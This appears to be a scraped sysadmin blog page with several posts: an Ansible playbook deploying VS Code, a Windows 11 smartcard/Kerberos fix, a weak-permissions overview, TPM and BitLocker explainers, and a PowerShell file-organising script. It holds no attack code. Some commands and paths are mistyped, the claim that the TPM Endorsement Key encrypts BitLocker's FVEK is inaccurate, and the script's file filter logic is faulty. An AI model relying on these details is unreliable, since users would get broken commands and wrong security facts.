"ansible controller": Adds a comment to the key. This comment helps identify the key later, especially when managing multiple keys. In this case, the comment is "ansible controller", which likely indicates that the key will be used for an Ansible control node. List the contents of the .ssh directory. The .pub file contains the public key, which is to be shared with other nodes. ls -la .ssh Copy the Public Key to the Dev Nodes Use the ssh-copy-id command to copy the public SSH key to the Dev nodes, enabling passwordless authentication. This command appends the public key to the ~/.ssh/authorized_keys file on the target node, ensuring secure access. For example: This process requires the target node's password for the first connection. Afterward, the SSH key allows secure, passwordless logins. ssh-copy-id -i ~/.ssh/id_ed25519.pub user@192.168.0.38 ssh-copy-id -i ~/.ssh/id_ed25519.pub user@192.168.0.39 Test the connection to each Dev node. ssh -i ~/.ssh/id_ed25519 user@192.168.0.38 ssh -i ~/.ssh/id_ed25519 user@192.168.0.39 Install Ansible on the Controller Node Set up Ansible on the Ansible Controller node by executing the following commands; sudo dnf updates sudo dnf install epel-release sudo dnf install ansible Copy Playbook from Github Clone the GitHub repository and move it to /home/user/ansible-vsc. git clone https://github.com/Tenaka/ansible_linux_vcs.git mkdir ansible-vcs mv ansible_linux_vcs/* ~/ansible-vcs cd ansible-vsc Keep in mind that ~ refers to the home directory in Linux. tree A Quick Review of the Playbook Some amendments to the inventory.txt file is probably needed, so I'm using nano as the text editor and steering clear of vi—there's only so much this MS Engineer is willing to embrace. Ansible.cfg defines the settings for this ansible playbook: inventory = Specifies the inventory file (inventory.txt) that contains the list of hosts Ansible will manage. private_key_file = ~Indicates the path to the private SSH key (~/.ssh/ided25519) used for authenticating to remote hosts. ~/ansible-vsc/ansible.cfg [defaults] inventory = inventory.txt private_key_file = ~/.ssh/ided25519 ~/ansible-vsc/inventory.txt [all] 192.168.0.28 192.168.0.38 192.168.0.39 [visualstudio] 192.168.0.38 192.168.0.39 ~/ansible-vsc/visualcode.yml --- - hosts: all become: true roles: - baseline - hosts: visualstudio become: true roles: - visualstudio ~/ansible-vsc/roles/visualstudio/tasks/main.yml - name: Add Microsoft GPG key rpm_key: state: present key: https://packages.microsoft.com/keys/microsoft.asc - name: Add Visual Studio Code repository yum_repository: name: vscode description: "Visual Studio Code" baseurl: https://packages.microsoft.com/yumrepos/vscode enabled: yes gpgcheck: yes gpgkey: https://packages.microsoft.com/keys/microsoft.asc - name: Install Visual Studio Code yum: name: code state: latest # Dont run as root and install extensions - name: Install desired VS Code extensions become: false shell: "code --install-extension {{ item }} --force" loop: - redhat.ansible - redhat.vscode-yaml register: vscode_extensions changed_when: "'already installed' not in vscode_extensions.stdout" - name: Display installed extensions debug: msg: "Installed extensions: {{ vscode_extensions.results | map(attribute='item') | list }}" While VSC is installed using sudo, installing extensions with elevated privileges does cause issues. Therefore, become is set to false. Deployment of Visual Studio Code Make sure to run the playbook from the ~/ansible-vsc directory. The command ansible-playbook --ask-become-pass visualcode.yml runs the Ansible playbook visualcode.yml with the following options: --ask-become-pass: Prompts you to enter a password for elevated (sudo) privileges on the target hosts. visualcode.yml: Specifies the playbook file to be executed. ansible-playbook --ask-become-pass visualcode.yml Enter the password at the prompt and sit back whilst ansible does all the work. In Ansible playbook output, 192.168.0.38 had previously been successful in deploying VSC during testing: changed: Indicates that a task made modifications to the target system. ok: This means that the task has successfully completed without making any changes. This often happens when the system is already in the desired state, such as when a package is already installed or a configuration file is already correct. Of course, these Linux boxes have a GUI installed—I'm an MS Engineer, and it's required for VSC. So login to each of the Dev nodes and launch VSC. After rolling up my sleeves and diving headfirst into the untamed wilderness of Linux, this Microsoft engineer emerged with calloused hands, and a newfound love for ansible. Sure, there were battles with YAML, was that 3 or 4 spaces, but every “PLAY RECAP: SUCCESS" felt like a badge of honor. And while I still instinctively reach for the Reboot button at every minor annoyance, I now pause a second or two to consider if the reboot is the correct course of action. Of course it is, it's the only action that works.

  • Windows 11 24H2 Smartcard and Accessing File Share Issues with EventID 40960

    EventID 40960 LSA (LsaSrv) The Security System detected an authentication error for the server cifs/DomainController. The failure code from authentication protocol NTLM was "The authentication failed since NTLM was blocked (0xc00004189)". After upgrading a domain client from Windows 11 23H2 to 24H2, I encountered an issue logging in with a smartcard. The login itself completes successfully, but once you're in, none of the domain mapped file shares are accessible. Instead, you're repeatedly prompted for the smartcard PIN, and authentication continues to fail. Interestingly, logging in with a regular username and password works without any problems—domain shares connect as expected and everything functions normally. The error recorded in the Security event log points to a failure in CIFS (SMB) authentication, specifically due to NTLM being blocked or unavailable. EventID 40960 LSA (LsaSrv) The Security System detected an authentication error for the server cifs/DomainController. The failure code from authentication protocol NTLM was "The authentication failed since NTLM was blocked (0xc00004189)". The environment is a Windows Server 2019 domain where NTLM is still permitted as a fullback when Kerberos fails. The clients and servers are a mix of Windows 11, Server 2019, and Server 2022. Users currently have the option to log in using either their YubiKey smartcards or traditional passwords. However, the plan is to transition fully to smartcard PIN-based logins—eliminating password-based authentication entirely within the next month. After a little research aka Google, and coming up empty, I didn’t find a definitive answer—but I did come across a few mentions that pointed toward the Security Option “Network security: Configure encryption types allowed for Kerberos.” I checked the setting, and sure enough, it was already configured globally to allow AES128_HMAC and AES256_HMAC_SHA1, so that didn’t appear to be the root cause. I’d love to say the fix was the result of some deep technical insight or a brilliant deduction, connecting all the dots. This was a shot-in-the-dark, coffee-fueled “I’ve seen enough weird Windows behavior to get a sense of déjà vu”. No documentation. No forum thread or Google results. And I hadn’t planned on doing anything more complex than turning on the Xbox and zoning out for a bit. I definitely wasn’t in the mood to wade through GPO settings or start faffing with klist and whatever other diagnostics I'd normally drag out for this kind of thing. So instead, I just opened up my user account settings, ticked the two checkboxes for “Kerberos AES encryption,” sighed, and hit OK—fully expecting nothing. And naturally… it worked. I logged with a smartcard and pin all the mapped network drives were present and accessible, then repeated the exercise with other accounts that had failed. The system was back and behaving itself. I really ought to thank Microsoft for their newfound consistency—consistently giving me fresh new material to blog about. It’s almost heartwarming, really. Takes me right back to the glory days of Windows NT 4, when every new Service Pack was less of an update and more of a creative new way to keep me gainfully employed.

  • Securing Weak File, Folder and Registry Hive Permissions.

    In this blog, we'll examine how threat actors—often referred to as hackers—can escalate privileges when weak file, directory, or registry permissions are present. Many programs disable directory inheritance or assign excessive permissions to user accounts, leading to vulnerabilities. Finding these misconfigurations can be challenging, as it involves reviewing extensive file, directory, and registry hive permissions that are often overlooked. Fortunately, I have a few scripts that help detect and report these vulnerabilities and can also reset permissions to their secure defaults. But first, let’s dive into the problem at hand... The Risks Here's a revised version of the text with your requested additions: "Improperly configured permissions for files, directories, and registry entries often create significant vulnerabilities that threat actors can exploit to escalate privileges or break out of restricted environments. When permissions are inadequately set, threat actors can gain access to or modify sensitive files, ultimately providing a pathway for unauthorized actions. Weak permissions enable unauthorized users to write and execute programs in specific directories or modify registry application paths, allowing them to redirect these paths to malicious locations. This redirection enables threat actors to inject and run their own code, giving them access to sensitive information or control over existing applications and files. Beyond simply executing programs, insecure directory permissions also allow unauthorized modification of file permissions. This level of access can be used to alter or delete important files or to introduce new files containing harmful code. Finally, these weak permissions open doors for attackers to leverage vulnerabilities within the operating system or its applications, allowing further access to the system. Additionally, unquoted paths and services with insufficient security configurations provide additional avenues for exploitation, allowing attackers to execute unauthorized commands and compromise system integrity." What to do.... Manually validating permissions across the operating system can be a slow and tedious process. After discovering some critical permission issues and recognizing the importance of thorough validation, I began developing a script for automated validation and pentesting. This script is available for download on GitHub, with all relevant links provided at the bottom of the page. The Scripts The Security Report Support Page Fix for Weak Permissions Fix Unquoted Paths

  • Understanding Windows 11, TPMs, PCRs, Secure Boot, Bitlocker and Where They Fail

    Understanding Windows 11, TPMs, PCRs, and Security Features Windows 11 requires Trusted Platform Module (TPM) 2.0 as part of its foundation for enhanced security, alongside features like Secure Boot, BitLocker, and Virtualization-Based Security (VBS). With these tools, Microsoft aims to shield devices from evolving threats in an increasingly hostile digital landscape. This article takes a closer look at these features and highlights their limitations, particularly in the context of remote attacks. Trusted Platform Module (TPM): The Basics A Trusted Platform Module (TPM) is a specialized chip designed to enhance security by providing cryptographic operations, safeguarding sensitive data, and ensuring system integrity. It can: Generate, store, and manage cryptographic keys. Validate the integrity of the boot process using Platform Configuration Registers (PCRs). Support security features like BitLocker and VBS. Types of TPM Discrete TPM: A dedicated hardware chip soldered to the motherboard. Firmware TPM (fTPM): Built into the CPU and implemented via firmware. Checking TPM Status Windows Security App: Go to Settings > Privacy & Security > Windows Security, then navigate to Device Security > Security Processor. TPM Management Console: Open the Run dialog, type tpm.msc , and press Enter to check the status and specification version. Command Line: Run tpmtool getdeviceinformation  to retrieve detailed TPM data, TPM Version: The specification version of the TPM (e.g., 2.0). Manufacturer Information: The manufacturer ID and version of the TPM chip. Supported Algorithms: Lists cryptographic algorithms supported by the TPM (e.g., RSA, SHA-256, etc.). PCR Banks: The hash algorithms used for Platform Configuration Registers (PCRs), such as SHA-1 or SHA-256. PCR Information: Indicates which PCRs are active and their supported configurations. TPM Status: The current operational state of the TPM, such as whether it's enabled, activated, or ready for use. PowerShell Cmdlets: Get-Tpm: Displays TPM status and version. Platform Configuration Registers (PCRs): Ensuring Boot Integrity PCRs in the TPM store hashed measurements of the System state during boot, providing a cryptographic log of boot-time events. They ensure integrity by providing a cryptographic record of boot-time events Uses of PCRs Secure Boot: Validates the bootloader, ensuring only trusted code is executed. BitLocker: Uses PCR values to confirm system integrity. Mismatched values (e.g., from tampering) trigger recovery mode. Commonly Used PCRs PCR 0: Measurements from the BIOS, firmware, and Core Root of Trust for Measurement (CRTM). PCR 2: Reflects UEFI Secure Boot state. PCR 4: Tracks bootloader integrity. PCR 7: Represents Secure Boot configuration. What is Secure Boot? Secure Boot, a UEFI feature that ensures only signed and trusted bootloaders are executed during system startup. The TPM strengthens this process by securely measuring and storing key boot components' hashes in its Platform Configuration Registers (PCRs). These measurements create a tamper-proof record of the boot sequence. How Secure Boot Works: Digital Signatures: Each component in the boot chain (e.g., firmware, bootloader) must have a valid digital signature. Key Hierarchies: Platform Key (PK): Authorizes changes to Secure Boot settings. Key Exchange Key (KEK): Manages authorized signatures. Allowed and Forbidden Lists: Specify trusted and untrusted binaries. Secure Boot and PCRs: PCR 7 reflects the Secure Boot state. Tampering with Secure Boot settings results in a different PCR value. Checking Secure Boot Status: Open the System Information tool (msinfo32). Look for Secure Boot State in the report. What is BitLocker? BitLocker is a full-disk encryption feature that leverages TPM to secure data. It ensures that data remains inaccessible if the system is tampered with or the drive is removed. How BitLocker Uses TPM: Stores encryption keys securely in TPM. Validates PCR values during boot. If the values match the expected measurements, the drive is unlocked. Configuring BitLocker: Open Explorer, navigate to C: Right click on C: and select 'Manage Bitlocker. Turn on Bitlocker and follow the prompts. What is Virtualization-Based Security (VBS) and HVCI? Virtualization-Based Security (VBS) uses hardware virtualization to create isolated memory regions for security-critical operations, enhancing system security. VBS Features: Hypervisor-Enforced Code Integrity (HVCI): Ensures only signed and verified drivers and binaries are executed. Relies on TPM for key storage and Secure Boot for integrity validation. Credential Guard: Protects Domain user credentials by isolating LSASS (Local Security Authority Subsystem Service) processes. Enabling VBS: Check hardware support: Virtualization support in BIOS/UEFI. Run msinfo32 and look for "Hyper-V Requirements." Enable VBS: Open Windows Security > Device Security > Core Isolation. Enable Memory Integrity. Verifying VBS Status: Run msinfo32 . Look for Virtualization-Based Security in the report. What These Features Don’t Protect While these tools provide strong defenses against physical tampering, they fall short against remote threats: Credential Theft - VBS's Credential Guard protects domain credentials but doesn’t secure local account credentials, which can be dumped from memory. Additionally, techniques like pass-the-hash allow attackers to use stolen hashes without decryption. Application Exploits - TPM protections don’t block malware that exploits software vulnerabilities. Attackers can bypass these defenses by targeting unpatched applications. Hardware-Level Attacks - Physical attacks on the Low Pin Count (LPC) bus could extract BitLocker keys if no PIN is used. Network-Based Attacks - Features like Secure Boot and TPM don’t address phishing, network infiltration, or lateral movement. Building a Comprehensive Security Strategy To address these gaps, organizations should bolster TPM-based features with additional measures: Application Control - Tools like Windows Defender Application Control (WDAC) enforce strict policies, blocking unauthorized applications and malware. Regular Patching - Keeping systems and applications up-to-date mitigates risks from known vulnerabilities. Multifactor Authentication (MFA) - Adds a layer of protection against credential theft and unauthorized access. Endpoint Detection and Response (EDR) - Monitors for suspicious activity and stops advanced attacks. The Takeaway Windows 11’s TPM-centric security features excel at defending against physical attacks, but they can’t stop remote exploits, credential theft, or network-based threats on their own. Think of them as a sturdy lock—effective at preventing break-ins, but not enough if attackers exploit the open Window. A layered security approach is essential to stay ahead of sophisticated threats.

  • Bitlocker a Closer Look

    In my previous blog , I explored how Microsoft leverages the Trusted Platform Module (TPM) to secure Windows 11. In this article, we’re going to take a deeper dive into BitLocker. What is Bitlocker BitLocker is a full disk encryption feature integrated into Microsoft Windows, designed to safeguard the integrity and confidentiality of data. By encrypting the system drive, BitLocker ensures that unauthorized users cannot access sensitive information, even if they gain physical access to the hardware. A core part of BitLocker’s security lies in the use of the Trusted Platform Module (TPM), which securely stores cryptographic keys needed to decrypt the data. Key Concepts in BitLocker Encryption Before diving into the workings of the private key and AES or XTS-AES, let's briefly define some of the key components involved in BitLocker’s encryption process: Full Volume Encryption Key (FVEK): The FVEK is the primary encryption key used by BitLocker to encrypt and decrypt the entire volume (the disk or partition). It is a symmetric key, meaning the same key is used for both encryption and decryption. This key is essential for protecting the actual data stored on the drive. Trusted Platform Module (TPM): The TPM is a hardware chip embedded in most modern computers that provides secure storage for cryptographic keys and ensures that the system's boot process has not been tampered with. It is used in conjunction with BitLocker to protect the FVEK and to prevent unauthorized access to encrypted data. Password/PIN: A password or PIN is an optional but highly recommended security measure that adds an extra layer of authentication for unlocking the encrypted drive. This PIN/password is needed in addition to the TPM’s cryptographic keys to unlock the system during boot. Adding a PIN/password mitigates the Low Pin Count (LPC) Bus attack, Recovery Key: If the TPM or PIN is unavailable (for example, if the hardware is replaced), BitLocker provides a recovery key, which is a 48-digit alphanumeric key. This recovery key is essential for unlocking the encrypted drive in such cases. How BitLocker's Private Key Works The concept of a private key in BitLocker differs from that of traditional asymmetric encryption, where two keys (a private key and a public key) are used. BitLocker uses symmetric encryption for disk encryption, meaning it uses a single key (the Full Volume Encryption Key) for both encryption and decryption. However, BitLocker’s security is strengthened by using the TPM and other factors (such as a PIN or password) to protect access to the Full Volume Encryption Key (FVEK). The private key in this context is tied to the TPM and is crucial for managing access to the FVEK. Here’s how it all works in detail: Generation of the Full Volume Encryption Key (FVEK) When BitLocker is first enabled on a system, the FVEK is generated. This key is used to encrypt the entire disk or volume. However, to protect this key, it cannot be stored on the disk in plain text. Instead, it is stored securely using the Trusted Platform Module (TPM). TPM and the Protection of the Private Key The TPM plays a central role in BitLocker’s encryption system. It is a hardware-based security chip that is embedded in many modern systems to provide tamper-resistant storage for cryptographic keys. The TPM protects the FVEK by encrypting it with a TPM-specific key, which is known as the TPM’s Endorsement Key (EK). This key is unique to the TPM and cannot be extracted by unauthorized parties, even if the hard drive is removed from the system and connected to another computer. Here’s how the process works: Encrypting the FVEK: When BitLocker is enabled, the FVEK is encrypted with the TPM’s key (which is securely stored in the TPM chip itself). Storing the Encrypted FVEK: The encrypted version of the FVEK is stored in the system’s memory and on the disk. However, it cannot be decrypted without the TPM and proper authentication (such as a PIN, password, or recovery key). Unlocking the Encrypted FVEK: Upon system startup, the TPM checks the system’s configuration, including the integrity of the BIOS, bootloader, and other critical boot components. If any changes are detected (for example, due to a malware attack or hardware change), the TPM will refuse to release the FVEK, thus preventing unauthorized access to the encrypted data. Releasing the FVEK: If the TPM verifies that the system configuration is unchanged and trusted, it will decrypt the FVEK and pass it to the system. This is the moment when the encryption key becomes available to decrypt the data on the disk. At this point, the system can proceed with loading the operating system and allowing the user to interact with their data. AES-256 vs. XTS-AES-256: The Encryption Methods BitLocker can use different encryption algorithms, and understanding the difference between AES-128, AES-256, XTS-AES-128 and XTS-AES-256 helps in understanding how BitLocker protects your data. In the context of this article AES-128 and XTS-AES-128 will be ignored. Both AES-256 and XTS-AES-256 are symmetric encryption algorithms, meaning they use the same key for both encryption and decryption, but they differ in how they operate and the level of protection they offer. AES-256 AES (Advanced Encryption Standard) is a widely-used encryption standard that provides strong encryption capabilities. The "256" in AES-256 refers to the length of the key used in the encryption process: 256 bits. AES-256 works by encrypting the data in fixed-size blocks (128 bits) using a key that is 256 bits long. While AES-256 is secure and resistant to brute-force attacks, the challenge with traditional AES encryption lies in the potential vulnerabilities in how it handles block ciphers. Specifically, in the case of full-disk encryption, AES-256 does not account for the fact that some patterns might emerge within the plaintext data as it’s encrypted. This is where XTS-AES-256 comes in. XTS-AES-256 XTS-AES-256 (or XEX Tweakable Block Cipher with Ciphertext Stealing) is an enhanced version of AES-256 specifically designed for disk encryption. While it uses the same AES-256 algorithm, it introduces a second key and modifies the way the encryption is applied to improve security, especially against attacks on the underlying disk encryption. XTS-AES-256 employs tweaking as part of its encryption process. It uses a tweak value to change how each block is encrypted, preventing certain patterns or structures in the encrypted data from being exploited. This makes it significantly harder for attackers to perform certain types of cryptanalysis on the encrypted data, particularly in full-disk encryption scenarios. For BitLocker, XTS-AES-256 is the preferred encryption method because it is specifically designed for disk encryption and provides stronger protection in that context. Adding a PIN or Password In addition to the TPM’s encryption of the FVEK, BitLocker can also be configured to require an additional authentication factor, such as a PIN or password. This adds another layer of security, ensuring that the FVEK is not released even if the TPM is bypassed. Here's how the process works when a PIN is added: PIN Encryption: The PIN is combined with the TPM’s key and a unique public key to create a secure, trusted boot environment. This combination of the TPM’s key and the user-supplied PIN ensures that the encrypted disk remains inaccessible without both the physical TPM key and the correct PIN. Decryption of the FVEK: The TPM will release the encrypted FVEK only if the correct PIN is entered at boot. Without the correct PIN, even if an attacker has physical access to the machine, they cannot decrypt the FVEK and thus cannot access the data on the drive. How the LPC Bus Can Compromise the TPM The LPC bus operates as a communication channel between the TPM chip and the Southbridge, and indirectly to the Northbridge or CPU. Since this bus was not originally designed with modern security threats in mind, it lacks encryption or robust protection mechanisms. Enhancing Security with a PIN To mitigate the risk of LPC bus attacks, BitLocker allows the use of a PIN as an additional authentication factor. Here’s how it works: User Input Required: Before the decryption process begins, the user must enter a PIN. This adds an extra layer of security beyond the TPM’s PCR-based integrity checks. Secure Key Unsealing: The TPM uses the correct PIN to unlock the private key. Without the PIN, the private key remains sealed, even if an attacker has access to the LPC bus. Protection Against Physical Attacks: Since the PIN is not transmitted over the LPC bus, it cannot be intercepted. This makes it effective against attacks that exploit the LPC bus to extract the private key. Recovery Key In case the TPM is unable to release the FVEK (for instance, if hardware is changed or the TPM’s configuration is corrupted), BitLocker allows users to unlock the drive using a recovery key. This recovery key is typically a 48-digit alphanumeric code that can be used to manually unlock the drive when other authentication methods fail. The recovery key can be stored in various ways: Saved to a USB drive. Printed out and stored in a secure location. Stored in a Microsoft account or Active Directory for enterprise users. If the TPM does not release the FVEK during boot, the system will prompt the user to enter the recovery key, allowing access to the encrypted disk. Conclusion BitLocker, when used with the TPM and XTS-AES-256 encryption, provides a highly secure solution for protecting data at rest. The TPM ensures that the decryption key is securely stored and not easily extracted, while XTS-AES-256 improves the security of full-disk encryption by mitigating the risk of attacks that exploit patterns in the encrypted data. Incorporating a PIN into the BitLocker setup, along with TPM and XTS-AES-256 encryption, provides the highest integrity for securing sensitive data and protecting against a wide range of potential threats.

  • PowerShell Logging and Not Start-Transcript

    Introduction While PowerShell's Start-Transcript command is a common choice for logging script output, it has its shortcomings. It records console output (write-host) without providing structured log levels, detailed formatting, or robust error tracking. Logging in PowerShell scripts is often overlooked, I know I often overlook it for 'just a quick script', yet it plays a crucial role in confirming output and in this example the movement of family photos, there is nothing more important on my computer system than the decades of pictures and videos and can't afford for any to be deleted or lost. So logging is vitally important The script to organise files by Year and then by Month can be downloaded from ( here ). Reminder Before You Begin Before running this script on important files, make sure to test it first! While it works on during my testing and implementation, it's always best to double-check before making big changes. Overview This PowerShell script is designed to automate file organization within a specified directory. It performs two main functions: Detecting and moving duplicate files based on SHA256 hashes to a duplicates folder. Sorting remaining files into subdirectories organized by year and month based on their last modified date. Additionally, the script implements detailed logging to track its execution, errors, and actions taken during the process. Key Components of the Script 1. Parameters and Initialization The script accepts two parameters: $Data2SortPath: The main directory containing files to be organized. $duplicatesPath: A subdirectory where duplicate files will be moved. A log file is also created at the start with a timestamped filename: $LogFile = "$($Data2SortPath)\OrganizeFilesLog_$(Get-Date -Format 'yyyyMMdd_HHmmss').log" This ensures that each script run generates a new log file, preventing overwriting of previous logs. 2. Logging Functionality The script includes a custom logging function, Write-MoveLog, to standardize log messages: function Write-MoveLog { param ( [string]$Message, [string]$LogLevel = "INFO" ) $Timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" "$Timestamp [$LogLevel] $Message" | Out-File -FilePath $LogFile -Append } This function: Formats logs with a timestamp. Assigns severity levels (INFO, ERROR, WARNING). Writes logs to the designated log file. 3. Directory Validation and Setup Before processing files, the script checks whether the specified directory exists: if (-not (Test-Path -Path $Data2SortPath)) { Write-MoveLog "Error: The specified path '$Data2SortPath' does not exist." "ERROR" throw "The specified path does not exist." } If the directory does not exist, an error is logged, and execution is halted. Similarly, it ensures the duplicates folder exists or creates it: if (-not (Test-Path -Path $duplicatesPath)) { New-Item -Path $duplicatesPath -ItemType Directory -Force | Out-Null Write-MoveLog "Created duplicates folder at '$duplicatesPath'." "INFO" } 4. Retrieving Files for Processing The script gathers all files within the directory, excluding .log and .zip files: $gtFiles = Get-ChildItem -Path $Data2SortPath -Recurse -File | Where { $_.DirectoryName -notmatch "duplicates" -or $_.extension -notmatch ".log" -and $_.extension -notmatch ".zip" } This ensures only relevant files are processed. 5. Detecting and Handling Duplicates Each file’s SHA256 hash is computed to detect duplicates: $gtFileHash = (Get-FileHash -Algorithm SHA256 -Path $file.FullName).Hash If a duplicate is found, it is moved to the duplicates folder with a unique name to avoid overwriting: $duplicateName = Join-Path -Path $duplicatesPath -ChildPath $file.Name $counter = 1 while (Test-Path -Path $duplicateName) { $duplicateName = Join-Path $duplicatesPath -ChildPath ("{0}_{1}{2}" -f $file.BaseName, $counter, $file.Extension) $counter++ } Move-Item -Path $file.FullName -Destination $duplicateName Write-MoveLog "Duplicate detected: '$($file.FullName)' moved to '$duplicateName'." "INFO" 6. Organizing Files by Date For non-duplicate files, the script determines their last modified date and organizes them into Year/Month folders: $year = $file.LastWriteTime.Year $monthName = (Get-Culture).DateTimeFormat.GetMonthName($file.LastWriteTime.Month) $yearPath = Join-Path -Path $Data2SortPath -ChildPath $year $monthPath = Join-Path -Path $yearPath -ChildPath $monthName If these directories do not exist, they are created: if (-not (Test-Path -Path $yearPath)) { New-Item -ItemType Directory -Path $yearPath -Force | Out-Null Write-MoveLog "Created year folder at '$yearPath'." "INFO" } if (-not (Test-Path -Path $monthPath)) { New-Item -ItemType Directory -Path $monthPath -Force | Out-Null Write-MoveLog "Created month folder at '$monthPath'." "INFO" } Files are then moved to their respective folders: $destination = Join-Path -Path $monthPath -ChildPath $file.Name Move-Item -Path $file.FullName -Destination $destination -Verbose Write-MoveLog "File '$($file.FullName)' moved to '$destination'." "INFO" If a naming conflict occurs, the file is renamed and moved: if (Test-Path -Path "$destination\$file.Name") { $duplicateName = Join-Path $duplicatesPath -ChildPath ("{0}_{1}{2}" -f $file.BaseName, $counter, $file.Extension) $counter++ Move-Item -Path $file.FullName -Destination $duplicateName Write-MoveLog "File '$($file.FullName)' moved to '$duplicateName'." "WARNING" } 7. Error Handling and Final Logging Errors are caught and logged throughout the script: catch { Write-MoveLog "Failed to move file '$file.FullName': $_" "ERROR" continue } Finally, a message indicates the script's completion: Write-MoveLog "File organization complete. See details in the log file at '$LogFile'." "INFO" Write-Host "Processing complete. Logs are saved to '$LogFile'." Conclusion This PowerShell script makes sorting your files a breeze! It finds duplicates, organizes everything by date, and keeps a detailed log so you always know what’s happening. The built-in logging helps with troubleshooting, making it easy to track any issues. Of course any issues please provide feedback via the form on the home page. Thanks and as always your time is appreciated.

bottom of page